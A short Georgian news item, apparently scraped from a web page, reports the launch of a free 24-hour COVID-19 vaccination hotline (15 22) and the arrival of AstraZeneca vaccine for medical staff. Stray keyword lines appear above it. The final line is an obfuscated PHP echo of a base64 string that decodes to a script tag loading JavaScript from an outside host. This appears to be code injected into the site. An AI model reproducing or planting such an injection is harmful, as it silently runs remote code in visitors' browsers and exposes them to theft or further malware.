celsiusi
ავერსი შნაიდერი
COVID-19-ის საწინააღმდეგო ვაქცინაციის შესახებ ინფორმაციის მისაღებად ცხელი ხაზი - 15 22 ამოქმედდა. როგორც "Business Time"-ს ჯანდაცვის სამინისტროდან აცნობეს, ცხელი ხაზის მიზანი ვაქცინაციის მსურველთა საჭიროებებზე სწრაფი რეაგირებაა.
 
"დაინტერესებულ პირებს შეუძლიათ აირჩიონ სასურველი დღე, საათი და სამედიცინო დაწესებულება, სადაც COVID-19-ით ვაქცინაციას შეძლებენ. ცხელი ხაზი 24 საათის განმავლობაში მუშაობს და საქართველოდან განხორციელებული ყველა ზარი უფასოა", - განმარტავენ სამინისტროში.
 
შეგახსენებთ, საქართველოში უკვე შემოვიდა "ასტრაზენეკას" ვაქცინა, რომელიც ამ ეტაპზე სამედიცინო პერსონალისთვისაა ხელმისაწვდომი.
1203
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");